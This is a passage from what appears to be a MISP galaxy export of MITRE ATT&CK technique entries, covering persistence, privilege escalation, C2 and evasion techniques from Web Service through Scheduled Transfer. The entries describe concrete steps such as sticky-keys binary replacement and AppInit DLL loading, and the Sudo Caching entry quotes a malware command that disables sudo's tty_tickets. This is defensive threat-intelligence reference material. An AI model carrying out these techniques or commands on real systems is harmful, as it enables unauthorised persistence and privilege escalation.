Web Service - T1102

Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).

The tag is: misp-galaxy:mitre-attack-pattern="Web Service - T1102"

Table 6185. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1102

AppInit DLLs - T1103

Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry)

The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)

The tag is: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1103"

Table 6186. Table References

Links

https://attack.mitre.org/techniques/T1103

https://msdn.microsoft.com/en-us/library/dn280412

https://support.microsoft.com/en-us/kb/197571

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Port Monitors - T1013

A port monitor can be set through the (Citation: AddMonitor) API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in <code>C:\Windows\System32</code> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to <code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>.

The Registry key contains entries for the following:

  • Local Port

  • Standard TCP/IP Port

  • USB Monitor

  • WSD Port

Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.

The tag is: misp-galaxy:mitre-attack-pattern="Port Monitors - T1013"

Table 6187. Table References

Links

http://msdn.microsoft.com/en-us/library/dd183341

https://attack.mitre.org/techniques/T1013

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf

Accessibility Features - T1015

Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.

Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>, launched when the shift key is pressed five times and <code>C:\Windows\System32\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)

Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods:

For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)

  • On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>

  • Magnifier: <code>C:\Windows\System32\Magnify.exe</code>

  • Narrator: <code>C:\Windows\System32\Narrator.exe</code>

  • Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>

  • App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>

The tag is: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1015"

Table 6188. Table References

Links

http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/

https://attack.mitre.org/techniques/T1015

https://capec.mitre.org/data/definitions/558.html

https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html

https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom

Clipboard Modification - T1510

Adversaries may abuse clipboard functionality to intercept and replace information in the Android device clipboard.(Citation: ESET Clipboard Modification February 2019)(Citation: Welivesecurity Clipboard Modification February 2019)(Citation: Syracuse Clipboard Modification 2014) Malicious applications may monitor the clipboard activity through the <code>ClipboardManager.OnPrimaryClipChangedListener</code> interface on Android to determine when the clipboard contents have changed.(Citation: Dr.Webb Clipboard Modification origin2 August 2018)(Citation: Dr.Webb Clipboard Modification origin August 2018) Listening to clipboard activity, reading the clipboard contents, and modifying the clipboard contents requires no explicit application permissions and can be performed by applications running in the background, however, this behavior has changed with the release of Android 10.(Citation: Android 10 Privacy Changes)

Adversaries may use [Clipboard Modification](https://attack.mitre.org/techniques/T1510) to replace text prior to being pasted, for example, replacing a copied Bitcoin wallet address with a wallet address that is under adversarial control.

[Clipboard Modification](https://attack.mitre.org/techniques/T1510) had been seen within the Android/Clipper.C trojan. This sample had been detected by ESET in an application distributed through the Google Play Store targeting cryptocurrency wallet numbers.(Citation: ESET Clipboard Modification February 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Clipboard Modification - T1510"

Table 6189. Table References

Links

http://www.cis.syr.edu/wedu/Research/paper/clipboard_attack_dimva2014.pdf

https://attack.mitre.org/techniques/T1510

https://developer.android.com/about/versions/10/privacy/changes#clipboard-data

https://vms.drweb.com/virus/?i=17517750

https://vms.drweb.com/virus/?i=17517761

https://www.eset.com/uk/about/newsroom/press-releases/first-clipper-malware-discovered-on-google-play-1/

https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/

Plist Modification - T1150

Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as <code>/Library/Preferences</code> (which execute with elevated privileges) and <code>~/Library/Preferences</code> (which execute with a user’s privileges). Adversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. (Citation: Sofacy Komplex Trojan)

The tag is: misp-galaxy:mitre-attack-pattern="Plist Modification - T1150"

Table 6190. Table References

Links

https://attack.mitre.org/techniques/T1150

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

Systemd Service - T1501

Systemd services can be used to establish persistence on a Linux system. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.

Systemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the <code>/etc/systemd/system</code> and <code>/usr/lib/systemd/system</code> directories and have the file extension <code>.service</code>. Each service unit file may contain numerous directives that can execute system commands.

  • ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a services is started manually by 'systemctl' or on system start if the service is set to automatically start.

  • ExecReload directive covers when a service restarts.

  • ExecStop and ExecStopPost directives cover when a service is stopped or manually by 'systemctl'.

Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)

While adversaries typically require root privileges to create/modify service unit files in the <code>/etc/systemd/system</code> and <code>/usr/lib/systemd/system</code> directories, low privilege users can create/modify service unit files in directories such as <code>~/.config/systemd/user/</code> to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)

The tag is: misp-galaxy:mitre-attack-pattern="Systemd Service - T1501"

Table 6191. Table References

Links

http://man7.org/linux/man-pages/man1/systemd.1.html

https://attack.mitre.org/techniques/T1501

https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a

https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html

https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang

https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/

https://www.freedesktop.org/wiki/Software/systemd/

https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence

Shared Webroot - T1051

This technique has been deprecated and should no longer be used.

Adversaries may add malicious content to an internally accessible website through an open network file share that contains the website’s webroot or Web content directory (Citation: Microsoft Web Root OCT 2016) (Citation: Apache Server 2018) and then browse to that content with a Web browser to cause the server to execute the malicious content. The malicious content will typically run under the context and permissions of the Web server process, often resulting in local system or administrative privileges, depending on how the Web server is configured.

This mechanism of shared access and remote execution could be used for lateral movement to the system running the Web server. For example, a Web server running PHP with an open network share could allow an adversary to upload a remote access tool and PHP script to execute the RAT on the system running the Web server when a specific page is visited. (Citation: Webroot PHP 2011)

The tag is: misp-galaxy:mitre-attack-pattern="Shared Webroot - T1051"

Table 6192. Table References

Links

http://httpd.apache.org/docs/2.4/getting-started.html#content

https://attack.mitre.org/techniques/T1051

https://capec.mitre.org/data/definitions/563.html

https://www.webroot.com/blog/2011/02/22/malicious-php-scripts-on-the-rise/

Native API - T1106

Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.

Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.

Native API functions (such as <code>NtCreateProcess</code>) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API <code>CreateProcess()</code> or GNU <code>fork()</code> will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)

Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)

Adversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001).

The tag is: misp-galaxy:mitre-attack-pattern="Native API - T1106"

Table 6193. Table References

Links

http://msdn.microsoft.com/en-us/library/ms682425

https://attack.mitre.org/techniques/T1106

https://developer.apple.com/documentation/coreservices

https://developer.apple.com/documentation/foundation

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1

https://docs.microsoft.com/en-us/windows/win32/api/

https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework

https://man7.org/linux/man-pages//man7/libc.7.html

https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/

https://redops.at/en/blog/direct-syscalls-vs-indirect-syscalls

https://undocumented.ntinternals.net/

https://www.cyberbit.com/blog/endpoint-security/malware-mitigation-when-direct-system-calls-are-used/

https://www.gnu.org/software/libc/

https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html

https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html

https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/

Deploy Container - T1610

Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.

Containers can be deployed by various means, such as via Docker’s <code>create</code> and <code>start</code> APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)

The tag is: misp-galaxy:mitre-attack-pattern="Deploy Container - T1610"

Table 6194. Table References

Links

https://attack.mitre.org/techniques/T1610

https://blog.aquasec.com/malicious-container-image-docker-container-host

https://docs.docker.com/engine/api/v1.41/#tag/Container

https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/

https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/

Launch Daemon - T1160

Per Apple’s developer documentation, when macOS and OS X boot up, launchd is run to finish system initialization. This process loads the parameters for each launch-on-demand system-level daemon from the property list (plist) files found in <code>/System/Library/LaunchDaemons</code> and <code>/Library/LaunchDaemons</code> (Citation: AppleDocs Launch Agent Daemons). These LaunchDaemons have property list files which point to the executables that will be launched (Citation: Methods of Mac Malware Persistence).

Adversaries may install a new launch daemon that can be configured to execute at startup by using launchd or launchctl to load a plist into the appropriate directories (Citation: OSX Malware Detection). The daemon name may be disguised by using a name from a related operating system or benign software (Citation: WireLurker). Launch Daemons may be created with administrator privileges, but are executed under root privileges, so an adversary may also use a service to escalate privileges from administrator to root.

The plist file permissions must be root:wheel, but the script or program that it points to has no such requirement. So, it is possible for poor configurations to allow an adversary to modify a current Launch Daemon’s executable and gain persistence or Privilege Escalation.

The tag is: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1160"

Table 6195. Table References

Links

https://attack.mitre.org/techniques/T1160

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf

https://www.synack.com/wp-content/uploads/2016/03/RSA_OSX_Malware.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

File Deletion - T1107

Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary’s footprint.

There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well. Examples include native [cmd](https://attack.mitre.org/software/S0106) functions such as DEL, secure deletion tools such as Windows Sysinternals SDelete, or other third-party file deletion tools. (Citation: Trend Micro APT Attack Tools)

The tag is: misp-galaxy:mitre-attack-pattern="File Deletion - T1107"

Table 6196. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/

https://attack.mitre.org/techniques/T1107

Redundant Access - T1108

This technique has been deprecated. Please use [Create Account](https://attack.mitre.org/techniques/T1136), [Web Shell](https://attack.mitre.org/techniques/T1505/003), and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.

Adversaries may use more than one remote access tool with varying command and control protocols or credentialed access to remote services so they can maintain access if an access mechanism is detected or mitigated.

If one type of tool is detected and blocked or removed as a response but the organization did not gain a full understanding of the adversary’s tools and access, then the adversary will be able to retain access to the network. Adversaries may also attempt to gain access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use [External Remote Services](https://attack.mitre.org/techniques/T1133) such as external VPNs as a way to maintain access despite interruptions to remote access tools deployed within a target network.(Citation: Mandiant APT1) Adversaries may also retain access through cloud-based infrastructure and applications.

Use of a [Web Shell](https://attack.mitre.org/techniques/T1100) is one such way to maintain access to a network through an externally accessible Web server.

The tag is: misp-galaxy:mitre-attack-pattern="Redundant Access - T1108"

Table 6197. Table References

Links

https://attack.mitre.org/techniques/T1108

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Component Firmware - T1109

Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1019) but conducted upon other system components that may not have the same capability or level of integrity checking. Malicious device firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.

The tag is: misp-galaxy:mitre-attack-pattern="Component Firmware - T1109"

Table 6198. Table References

Links

https://attack.mitre.org/techniques/T1109

https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html

https://www.smartmontools.org/

System Firmware - T1019

The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. (Citation: Wikipedia BIOS) (Citation: Wikipedia UEFI) (Citation: About UEFI)

System firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.

The tag is: misp-galaxy:mitre-attack-pattern="System Firmware - T1019"

Table 6199. Table References

Links

http://www.intelsecurity.com/advanced-threat-research/content/data/HT-UEFI-rootkit.html

http://www.mitre.org/capabilities/cybersecurity/overview/cybersecurity-blog/copernicus-question-your-assumptions-about

http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research

http://www.uefi.org/about

https://attack.mitre.org/techniques/T1019

https://capec.mitre.org/data/definitions/532.html

https://en.wikipedia.org/wiki/BIOS

https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface

https://github.com/chipsec/chipsec

https://securingtomorrow.mcafee.com/business/chipsec-support-vault-7-disclosure-scanning/

Data Encrypted - T1022

Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.

Other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)

The tag is: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1022"

Table 6200. Table References

Links

http://www.netsec.colostate.edu/zhang/DetectingEncryptedBotnetTraffic.pdf

https://attack.mitre.org/techniques/T1022

https://en.wikipedia.org/wiki/List_of_file_signatures

Data Hiding - T1320

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1320).

Certain types of traffic (e.g., DNS tunneling, header inject) allow for user-defined fields. These fields can then be used to hide data. In addition to hiding data in network protocols, steganography techniques can be used to hide data in images or other file formats. Detection can be difficult unless a particular signature is already known. (Citation: BotnetsDNSC2) (Citation: HAMMERTOSS2015) (Citation: DNS-Tunnel)

The tag is: misp-galaxy:mitre-attack-pattern="Data Hiding - T1320"

Table 6201. Table References

Links

https://attack.mitre.org/techniques/T1320

Shortcut Modification - T1023

Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.

The tag is: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1023"

Table 6202. Table References

Links

https://attack.mitre.org/techniques/T1023

https://capec.mitre.org/data/definitions/132.html

Broadcast Receivers - T1402

An intent is a message passed between Android application or system components. Applications can register to receive broadcast intents at runtime, which are system-wide intents delivered to each app when certain events happen on the device, such as network changes or the user unlocking the screen. Malicious applications can then trigger certain actions within the app based on which broadcast intent was received.

Further, malicious applications can register for intents broadcasted by other applications in addition to the Android system itself. This allows the malware to respond based on actions in other applications. This behavior typically indicates a more intimate knowledge, or potentially the targeting of specific devices, users, or applications.

In Android 8 (API level 26), broadcast intent behavior was changed, limiting the implicit intents that applications can register for in the manifest. In most cases, applications that register through the manifest will no longer receive the broadcasts. Now, applications must register context-specific broadcast receivers while the user is actively using the app.(Citation: Android Changes to System Broadcasts)

The tag is: misp-galaxy:mitre-attack-pattern="Broadcast Receivers - T1402"

Table 6203. Table References

Links

https://attack.mitre.org/techniques/T1402

https://developer.android.com/guide/components/broadcasts#changes-system-broadcasts

User Execution - T1204

An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).

While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user’s desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).

Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204). For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)

The tag is: misp-galaxy:mitre-attack-pattern="User Execution - T1204"

Table 6204. Table References

Links

https://attack.mitre.org/techniques/T1204

https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-attack-delivery

Task requirements - T1240

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1240).

Once divided into the most granular parts, analysts work with collection managers to task the collection management system with requirements and sub-requirements. (Citation: Heffter) (Citation: JP2-01)

The tag is: misp-galaxy:mitre-attack-pattern="Task requirements - T1240"

Table 6205. Table References

Links

https://attack.mitre.org/techniques/T1240

Traffic Signaling - T1205

Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.

Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).

The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.

On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.(Citation: Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.

Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic Packet)

The tag is: misp-galaxy:mitre-attack-pattern="Traffic Signaling - T1205"

Table 6206. Table References

Links

https://attack.mitre.org/techniques/T1205

https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN

https://www.amd.com/system/files/TechDocs/20213.pdf

https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/

https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631

https://www.mandiant.com/resources/synful-knock-acis

Multiband Communication - T1026

This technique has been deprecated and should no longer be used.

Some adversaries may split communications between different protocols. There could be one protocol for inbound command and control and another for outbound data, allowing it to bypass certain firewall restrictions. The split could also be random to simply avoid data threshold alerts on any one communication.

The tag is: misp-galaxy:mitre-attack-pattern="Multiband Communication - T1026"

Table 6207. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1026

Sudo Caching - T1206

The <code>sudo</code> command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments." (Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a <code>timestamp_timeout</code> that is the amount of time in minutes between instances of <code>sudo</code> before it will re-prompt for a password. This is because <code>sudo</code> has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at <code>/var/db/sudo</code> with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a <code>tty_tickets</code> variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).

Adversaries can abuse poor configurations of this to escalate privileges without needing the user’s password. <code>/var/db/sudo</code>'s timestamp can be monitored to see if it falls within the <code>timestamp_timeout</code> range. If it does, then malware can execute sudo commands without needing to supply the user’s password. When <code>tty_tickets</code> is disabled, adversaries can do this from any tty for that user.

The OSX Proton Malware has disabled <code>tty_tickets</code> to potentially make scripting easier by issuing <code>echo \'Defaults !tty_tickets\' >> /etc/sudoers</code> (Citation: cybereason osx proton). In order for this change to be reflected, the Proton malware also must issue <code>killall Terminal</code>. As of macOS Sierra, the sudoers file has <code>tty_tickets</code> enabled by default.

The tag is: misp-galaxy:mitre-attack-pattern="Sudo Caching - T1206"

Table 6208. Table References

Links

https://attack.mitre.org/techniques/T1206

https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does

https://www.sudo.ws/

Time Providers - T1209

The Windows Time service (W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients. (Citation: Microsoft TimeProvider)

Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\</code>. (Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed. (Citation: Microsoft TimeProvider)

Adversaries may abuse this architecture to establish Persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account. (Citation: Github W32Time Oct 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Time Providers - T1209"

Table 6209. Table References

Links

https://attack.mitre.org/techniques/T1209

https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings

https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-top

https://github.com/scottlundgren/w32time

https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx

https://technet.microsoft.com/en-us/sysinternals/bb963902

Scheduled Transfer - T1029

Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.

